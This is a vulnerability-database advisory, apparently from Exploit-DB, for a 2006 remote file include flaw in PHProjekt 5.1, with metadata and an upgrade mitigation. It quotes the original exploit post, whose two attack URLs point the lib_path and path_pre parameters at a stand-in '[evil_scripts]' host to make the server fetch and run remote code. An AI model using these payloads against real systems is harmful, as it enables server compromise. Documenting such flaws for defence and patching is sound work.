PHProjekt v. 5.1 Remote File Include Vulnerability

vendor:

PHProjekt

by:

Kacper (a.k.a Rahim)

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: PHProjekt

Affected Version From: 5.1

Affected Version To: 5.1

Patch Exists: YES

Related CWE: N/A

CPE: a:phprojekt:phprojekt

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PHProjekt v. 5.1 Remote File Include Vulnerability

PHProjekt is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. Successful exploits will allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Upgrade to the latest version of PHProjekt

Source

Exploit-DB raw data:

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: PHProjekt v. 5.1
- [Script site: http://www.phprojekt.com/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Greetz: DragonHeart
- and all DEVIL TEAM Members :-)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
#Expl:

http://www.site.com/[PHProjekt_path]/lib/dbman_filter.inc.php?lib_path=[evil_scripts]

http://www.site.com/[PHProjekt_path]/lib/specialdays.php?path_pre=[evil_scripts]

#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-08-15]